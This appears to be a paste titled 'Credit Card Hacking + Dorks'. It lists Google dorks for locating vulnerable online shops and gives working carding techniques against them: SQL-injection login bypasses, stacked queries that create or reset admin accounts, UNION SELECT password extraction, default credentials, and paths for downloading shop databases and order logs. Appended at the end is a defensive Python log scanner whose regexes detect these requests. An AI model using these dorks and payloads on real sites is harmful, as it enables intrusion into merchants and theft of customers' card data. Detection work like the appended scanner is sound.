RintoMuhamad

Credit Card Hacking + Dorks 2015+ Dorks Explained -By Rinto

Feb 6th, 2016
  1. ##################################
  2. Google Dorks List - By SUSUTEAM #
  3. ##################################
  4.  
  5.  
  6. inurl:".php?cat="+intext:"Paypal"+site:UK
  7. inurl:".php?cat="+intext:"/Buy Now/"+site:.net
  8. inurl:".php?cid="+intext:"online+betting"
  9.  
  10.  
  11.  
  12. inurl:".php?id=" intext:"View cart"
  13. inurl:".php?id=" intext:"Buy Now"
  14. inurl:".php?id=" intext:"add to cart"
  15. inurl:".php?id=" intext:"shopping"
  16. inurl:".php?id=" intext:"boutique"
  17. inurl:".php?id=" intext:"/store/"
  18. inurl:".php?id=" intext:"/shop/"
  19. inurl:".php?id=" intext:"toys"
  20.  
  21. inurl:".php?cid="
  22. inurl:".php?cid=" intext:"shopping"
  23. inurl:".php?cid=" intext:"add to cart"
  24. inurl:".php?cid=" intext:"Buy Now"
  25. inurl:".php?cid=" intext:"View cart"
  26. inurl:".php?cid=" intext:"boutique"
  27. inurl:".php?cid=" intext:"/store/"
  28. inurl:".php?cid=" intext:"/shop/"
  29. inurl:".php?cid=" intext:"Toys"
  30.  
  31. inurl:".php?cat="
  32. inurl:".php?cat=" intext:"shopping"
  33. inurl:".php?cat=" intext:"add to cart"
  34. inurl:".php?cat=" intext:"Buy Now"
  35. inurl:".php?cat=" intext:"View cart"
  36. inurl:".php?cat=" intext:"boutique"
  37. inurl:".php?cat=" intext:"/store/"
  38. inurl:".php?cat=" intext:"/shop/"
  39. inurl:".php?cat=" intext:"Toys"
  40.  
  41. inurl:".php?catid="
  42. inurl:".php?catid=" intext:"View cart"
  43. inurl:".php?catid=" intext:"Buy Now"
  44. inurl:".php?catid=" intext:"add to cart"
  45. inurl:".php?catid=" intext:"shopping"
  46. inurl:".php?catid=" intext:"boutique"
  47. inurl:".php?catid=" intext:"/store/"
  48. inurl:".php?catid=" intext:"/shop/"
  49. inurl:".php?catid=" intext:"Toys"
  50.  
  51. inurl:".php?categoryid="
  52. inurl:".php?categoryid=" intext:"View cart"
  53. inurl:".php?categoryid=" intext:"Buy Now"
  54. inurl:".php?categoryid=" intext:"add to cart"
  55. inurl:".php?categoryid=" intext:"shopping"
  56. inurl:".php?categoryid=" intext:"boutique"
  57. inurl:".php?categoryid=" intext:"/store/"
  58. inurl:".php?categoryid=" intext:"/shop/"
  59. inurl:".php?categoryid=" intext:"Toys"
  60.  
  61. inurl:".php?pid="
  62. inurl:".php?pid=" intext:"shopping"
  63. inurl:".php?pid=" intext:"add to cart"
  64. inurl:".php?pid=" intext:"Buy Now"
  65. inurl:".php?pid=" intext:"View cart"
  66. inurl:".php?pid=" intext:"boutique"
  67. inurl:".php?pid=" intext:"/store/"
  68. inurl:".php?pid=" intext:"/shop/"
  69. inurl:".php?pid=" intext:"toys"
  70.  
  71. inurl:".php?prodid=
  72. inurl:".php?prodid=" intext:"shopping"
  73. inurl:".php?prodid=" intext:"add to cart"
  74. inurl:".php?prodid=" intext:"Buy Now"
  75. inurl:".php?prodid=" intext:"View cart"
  76. inurl:".php?prodid=" intext:"boutique"
  77. inurl:".php?prodid=" intext:"/store/"
  78. inurl:".php?prodid=" intext:"/shop/"
  79. inurl:".php?prodid=" intext:"toys"
  80.  
  81. inurl:".php?productid='
  82. inurl:".php?productid=" intext:"shopping"
  83. inurl:".php?productid=" intext:"add to cart"
  84. inurl:".php?productid=" intext:"Buy Now"
  85. inurl:".php?productid=" intext:"View cart"
  86. inurl:".php?productid=" intext:"boutique"
  87. inurl:".php?productid=" intext:"/store/"
  88. inurl:".php?productid=" intext:"/shop/"
  89. inurl:".php?productid=" intext:"Toys"
  90.  
  91. inurl:".php?product="
  92. inurl:".php?product=" intext:"shopping"
  93. inurl:".php?product=" intext:"add to cart"
  94. inurl:".php?product=" intext:"Buy Now"
  95. inurl:".php?product=" intext:"View cart"
  96. inurl:".php?product=" intext:"boutique"
  97. inurl:".php?product=" intext:"/store/"
  98. inurl:".php?product=" intext:"/shop/"
  99. inurl:".php?product=" intext:"toys"
  100. inurl:".php?product=" intext:"DVD"
  101.  
  102. inurl:".php?products="
  103. inurl:".php?products=" intext:"shopping"
  104. inurl:".php?products=" intext:"add to cart"
  105. inurl:".php?products=" intext:"Buy Now"
  106. inurl:".php?products=" intext:"View cart"
  107. inurl:".php?products=" intext:"boutique"
  108. inurl:".php?products=" intext:"/store/"
  109. inurl:".php?products=" intext:"/shop/"
  110. inurl:".php?products=" intext:"toys"
  111. inurl:".php?products=" intext:"DVD"
  112.  
  113. inurl:".php?proid="
  114. inurl:".php?proid=" intext:"shopping"
  115. inurl:".php?proid=" intext:"add to cart"
  116. inurl:".php?proid=" intext:"Buy Now"
  117. inurl:".php?proid=" intext:"View cart"
  118. inurl:".php?proid=" intext:"boutique"
  119. inurl:".php?proid=" intext:"/store/"
  120. inurl:".php?proid=" intext:"/shop/"
  121. inurl:".php?proid=" intext:"toys"
  122.  
  123. inurl:".php?shopid="
  124. inurl:".php?shopid=" intext:"shopping"
  125. inurl:".php?shopid=" intext:"add to cart"
  126. inurl:".php?shopid=" intext:"Buy Now"
  127. inurl:".php?shopid=" intext:"View cart"
  128. inurl:".php?shopid=" intext:"boutique"
  129. inurl:".php?shopid=" intext:"/store/"
  130. inurl:".php?shopid=" intext:"/shop/"
  131. inurl:".php?shopid=" intext:"Toys"
  132.  
  133. inurl:".php?itemid="
  134. inurl:".php?itemid=" intext:"shopping"
  135. inurl:".php?itemid=" intext:"add to cart"
  136. inurl:".php?itemid=" intext:"Buy Now"
  137. inurl:".php?itemid=" intext:"View cart"
  138. inurl:".php?itemid=" intext:"boutique"
  139. inurl:".php?itemid=" intext:"/shop/"
  140. inurl:".php?itemid=" intext:"/store/"
  141. inurl:".php?itemid=" intext:"Toys"
  142.  
  143. inurl:".php?orderid="
  144. inurl:".php?orderid=" intext:"shopping"
  145. inurl:".php?orderid=" intext:"add to cart"
  146. inurl:".php?orderid=" intext:"Buy Now"
  147. inurl:".php?orderid=" intext:"View cart"
  148. inurl:".php?orderid=" intext:"boutique"
  149. inurl:".php?orderid=" intext:"/shop/"
  150. inurl:".php?orderid=" intext:"/store/"
  151. inurl:".php?orderid=" intext:"Toys"
  152.  
  153.  
  154. inurl:".php?catalogId="
  155. inurl:".php?catalogId=" intext:"shopping"
  156. inurl:".php?catalogId=" intext:"add to cart"
  157. inurl:".php?catalogId=" intext:"Buy Now"
  158. inurl:".php?catalogId=" intext:"View cart"
  159. inurl:".php?catalogId=" intext:"boutique"
  160. inurl:".php?catalogId=" intext:"/shop/"
  161. inurl:".php?catalogId=" intext:"/store/"
  162. inurl:".php?catalogId=" intext:"Toys"
  163.  
  164. inurl:".php?aid="
  165. inurl:".php?aid=" intext:"shopping"
  166. inurl:".php?aid=" intext:"add to cart"
  167. inurl:".php?aid=" intext:"Buy Now"
  168. inurl:".php?aid=" intext:"View cart"
  169. inurl:".php?aid=" intext:"boutique"
  170. inurl:".php?aid=" intext:"/shop/"
  171. inurl:".php?aid=" intext:"/store/"
  172. inurl:".php?aid=" intext:"toys"
  173.  
  174. inurl:".php?artid="
  175. inurl:".php?artid=" intext:"shopping"
  176. inurl:".php?artid=" intext:"add to cart"
  177. inurl:".php?artid=" intext:"Buy Now"
  178. inurl:".php?artid=" intext:"View cart"
  179. inurl:".php?artid=" intext:"boutique"
  180. inurl:".php?artid=" intext:"/shop/"
  181. inurl:".php?artid=" intext:"/store/"
  182. inurl:".php?artid=" intext:"toys"
  183.  
  184.  
  185. inurl:".php?articleid="
  186. inurl:".php?articleid=" intext:"shopping"
  187. inurl:".php?articleid=" intext:"add to cart"
  188. inurl:".php?articleid=" intext:"Buy Now"
  189. inurl:".php?articleid=" intext:"View cart"
  190. inurl:".php?articleid=" intext:"boutique"
  191. inurl:".php?articleid=" intext:"/shop/"
  192. inurl:".php?articleid=" intext:"/store/"
  193. inurl:".php?articleid=" intext:"toys"
  194.  
  195. ##############################################
  196. Dork list +How to Do Carding- 2015 - March 20#
  197. ##############################################
  198.  
  199. DORK CARDING 2015 AND HOW TO EXPLOIT
  200. ============Legion7sign============
  201.  
  202. user.php?id=
  203. user.bmlid=
  204. user.jsp?id=
  205. user.cfm?id=
  206. user.htlm?id=
  207. user.php?CategoryID=
  208. user.php?shopID=
  209. user.php?shippingID=
  210. user.php?infoID=
  211. user.php?custID=
  212. user.php?webID=
  213. user.php?cad=
  214.  
  215. How to exploit :
  216.  
  217. [-]Tool
  218. -gr3enox exploit scanner
  219.  
  220.  
  221. Example dork :
  222. paypal : user.php?id=
  223. CreditCard : user.php?pay=
  224.  
  225. Paypal :
  226. user.php?id= < you can edit this dork :
  227. customer.php?id=
  228.  
  229. if you want to exploit just change the customer < & id < only
  230. example : payment.php?aspx=
  231. payment.php?jsp=
  232.  
  233. Credit Card :
  234. user.php?pay= < example dork cc you can change :
  235. customer.php?pay=
  236.  
  237. wanna try ?
  238.  
  239. just change customer < & pay <
  240.  
  241. example :
  242.  
  243. amex.php?CategoryID=
  244.  
  245. exploit sample :
  246. u.php?jsp=
  247. u.php?aspx=
  248. u.php?id=
  249. u.php?pay=
  250. u.php?cat=
  251. u.php?search=
  252. u.php?urlid=
  253. u.php?car=
  254.  
  255. *PS : " You can add site like this : u.php?car=+site:uk
  256.  
  257. =======IT'S AT YOUR OWN RISK=======
  258.  
  259.  
  260. ##############################
  261. Full Explanation For Carding##
  262. ##############################
  263.  
  264.  
  265. ###############
  266. SuSu Hack Team#
  267. ###############
  268.  
  269. 1:
  270. google dork :--> inurl:"/cart.php?m="
  271. target looks lile :--> ...cart.php?m=view
  272. exploit: chage cart.php?m=view to /admin
  273. target whit exploit :-->
  274. Usename : 'or"="
  275. Password : 'or"=
  276.  
  277. 2:
  278. google dork :--> allinurlroddetail.asp?prod=
  279. target looks like :--> xxxxx.org (big leters and numbers )
  280. exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb
  281. target whit exploit :--> www.xxxxxx.org/fpdb/vsproducts.mdb
  282.  
  283. 3:
  284. google dork :--> allinurl: /cgi-local/shopper.cgi
  285. target looks like :--> ....dd=action&key=
  286. exploit :--> ...&template=order.log
  287. target whit exploit :--> .....late=order.log
  288.  
  289. 4:
  290. google dork :--> allinurl: Lobby.asp
  291. target looks like :--> www.xxxxx.com/mall/lobby.asp
  292. exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb
  293. target whit exploit :--> www.xxxxx.com/fpdb/shop.mdb
  294.  
  295. 5:
  296. google dork :--> allinurl:/vpasp/shopsearch.asp
  297. when u find a target put this in search box
  298. Keyword=&category=5); insert into tbluser (fldusername) values
  299. ('')--&SubCategory=&hide=&action.x=46&action.y=6
  300. Keyword=&category=5); update tbluser set fldpassword='' where
  301. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  302. Keyword=&category=3); update tbluser set fldaccess='1' where
  303. fldusername=''--&SubCategory=All&action.x=33&action.y=6
  304. Jangan lupa untuk mengganti dan nya terserah kamu.
  305. Untuk mengganti password admin, masukkan keyword berikut :
  306. Keyword=&category=5); update tbluser set fldpassword='' where
  307. fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
  308.  
  309. login page:
  310.  
  311. 6:
  312. google dork :--> allinurl:/vpasp/shopdisplayproducts.asp
  313. target looks like :--> ....asp?cat=xxxxxx
  314. exploit :--> ...20union%20sele ct%20fldauto,fldpassword%20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'-
  315. if this is not working try this ends
  316. %20'a%25'--
  317. %20'b%25'--
  318. %20'c%25'--
  319. after finding user and pass go to login page:
  320.  
  321. 7:
  322. google dork :--> allinurl:/shopadmin.asp
  323. target looks like :--> www.xxxxxx.com/shopadmin.asp
  324. exploit:
  325. user : 'or'1
  326. pass : 'or'1
  327.  
  328. 8:
  329. google.com :--> allinurl:/store/index.cgi/page=
  330. target looks like :--> ....shortblue.htm
  331. exploit :--> ../admin/files/order.log
  332. target whit exploit :--> .c....iles/order.log
  333.  
  334. 9:
  335. google.com:--> allinurl:/metacart/
  336. target looks like :--> www.xxxxxx.com/metacart/about.asp
  337. exploit :--> /database/metacart.mdb
  338. target whit exploit :--> www.xxxxxx.com/metacart/database/metacart.mdb
  339.  
  340. 10:
  341. google.com:--> allinurl:/DCShop/
  342. target looks like :--> www.xxxxxx.com/xxxx/DCShop/xxxx
  343. exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt
  344. target whit exploit :--> www.xxxx.com/xxxx/DCShop/orders/orders.txt or www.xxxx.com/xxxx/DCShop/Orders/orders.txt
  345.  
  346. 11:
  347. google.com:--> allinurl:/shop/category.asp/catid=
  348. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
  349. exploit :--> /admin/dbsetup.asp
  350. target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
  351. after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
  352. target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
  353. in db look for access to find pass and user of shop admins.
  354.  
  355. 12:
  356. google.com:--> allinurl:/commercesql/
  357. target looks like :--> www.xxxxx.com/commercesql/xxxxx
  358. exploit :--> cgi-bin/commercesql/index.cgi?page=
  359. target whit exploit admin config :--> ..../adminconf.pl
  360. target whit exploit admin manager :--> ....in/manager.cgi
  361. target whit exploit order.log :--> ....iles/order.log
  362.  
  363. 13:
  364. google.com:--> allinurl:/eshop/
  365. target looks like :--> www.xxxxx.com/xxxxx/eshop
  366. exploit :-->/cg-bin/eshop/database/order.mdb
  367. target whit exploit :--> ....base/order.mdb
  368. after dl the db look at access for user and password
  369.  
  370. 14:
  371. 1/ search google: allinurl:"shopdisplayproducts.asp?id=
  372. --->=5
  373.  
  374. 2/ find error by adding '
  375. --->=5'
  376.  
  377. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
  378.  
  379. -If you don't see error then change id to cat
  380.  
  381. --->=5'
  382.  
  383. 3/ if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sppassword
  384.  
  385. --->...on%20select%20 1%20from%20tbluser"having%201=1--sppassword
  386.  
  387. --->error: 5' union select 1 from tbluser "having 1=1--sppassword.... The number of column in the two selected tables or queries of a union queries do not match......
  388.  
  389. 4/ add 2,3,4,5,6.......until you see a nice table
  390.  
  391. add 2
  392. ---->...on%20select%20 1,2%20from%20tbluser"having%201=1--sppassword
  393. then 3
  394. ---->...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sppassword
  395. then 4 ---->...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sppassword
  396.  
  397. ...5,6,7,8,9.... untill you see a table. (exp:...47)
  398.  
  399. ---->...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sppassword
  400. ---->see a table.
  401.  
  402. 5/ When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
  403.  
  404. --->...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sppassword
  405.  
  406. 6/ Find link admin to login:
  407. try this first:
  408. or:
  409.  
  410. Didn't work? then u have to find yourself:
  411.  
  412. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
  413.  
  414. --->...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sppassword
  415.  
  416. you'll see something like: ( lot of them)
  417.  
  418. shopaddmoretocart.asp
  419. shopcheckout.asp
  420. shopdisplaycategories.asp
  421. ..............
  422.  
  423. then guess admin link by adding the above data untill you find admin links
  424.  
  425. 15:
  426. xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
  427. the most important thing here is xDatabase
  428. xDatabase: shopping140
  429. ok now the URL will be like this:
  430. ****://.victim.com/shop/shopping140.mdb
  431. if you didn't download the Database..
  432. Try this while there is dblocation.
  433. xDblocation
  434. resx
  435.  
  436. the url will be:
  437. ****://.victim.com/shop/resx/shopping140.mdb
  438. If u see the error message you have to try this :
  439. ****://.victim.com/shop/shopping500.mdb
  440.  
  441. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
  442.  
  443. inside you should be able to find *** information.
  444. and you should even be able to find the admin username and password for the website.
  445.  
  446. the admin login page is usually located here
  447. ****://.victim.com/shop/shopadmin.asp
  448.  
  449. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
  450.  
  451. Username: admin
  452. password: admin
  453. OR
  454. Username: vpasp
  455. password: vpasp
  456.  
  457. Hope you enjoy this !!
  458.  
  459.  
  460.  
  461. By Rinto
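
For defenders, the request patterns in this paste map directly onto web-server log detections. The following is an added example, not part of the original paste: it scans access-log lines for requests to shop data files (.mdb, order.log, orders.txt), setup/config pages, and SQL-injection markers in query strings. The rule names, sample log lines and IP addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Rules built from the paths and payload shapes listed in the paste above.
# Rule names are hypothetical labels chosen for this example.
PATH_RULES = [
    ("datastore-download", re.compile(r"\.mdb$|/order\.log$|/orders/orders\.txt$", re.I)),
    ("setup-or-config-page", re.compile(r"/(dbsetup\.asp|adminconf\.pl)$", re.I)),
]
QUERY_RULES = [
    ("sqli-union-select", re.compile(r"union\s+select", re.I)),
    ("sqli-stacked-write", re.compile(r"\)\s*;\s*(insert|update)\b", re.I)),
    ("template-file-read", re.compile(r"(^|&)template=[^&]*\.log", re.I)),
]

# Common/combined log format: ip, identity, user, [time], "METHOD target proto", status
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

def scan(lines):
    """Return one finding per request line that matches any rule."""
    findings = []
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue  # not a parseable request line
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        parts = urlsplit(target)
        path = unquote(parts.path)          # decode %xx before matching
        query = unquote_plus(parts.query)   # also turns '+' into a space
        path_hits = [name for name, rx in PATH_RULES if rx.search(path)]
        query_hits = [name for name, rx in QUERY_RULES if rx.search(query)]
        if path_hits or query_hits:
            findings.append({
                "ip": ip,
                "path": path,
                "rules": path_hits + query_hits,
                # A 200 on a data/config path means the file was served:
                # confirmed exposure rather than a failed probe.
                "exposed": bool(path_hits) and status == 200,
            })
    return findings

# Constructed sample log lines (documentation IP ranges, made-up requests).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Feb/2016:10:00:01 +0000] "GET /shop/category.asp?catid=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Feb/2016:10:00:05 +0000] "GET /fpdb/shop.mdb HTTP/1.1" 200 884736',
    '198.51.100.7 - - [06/Feb/2016:10:00:09 +0000] "GET /shopdisplayproducts.asp?cat=5%20union%20select%201,2 HTTP/1.1" 500 310',
    '198.51.100.7 - - [06/Feb/2016:10:00:12 +0000] "GET /DCShop/orders/orders.txt HTTP/1.1" 404 209',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with `exposed` set to True means the server actually returned the file: move data files out of the web root or deny those extensions at the server, and rotate any credentials stored in them.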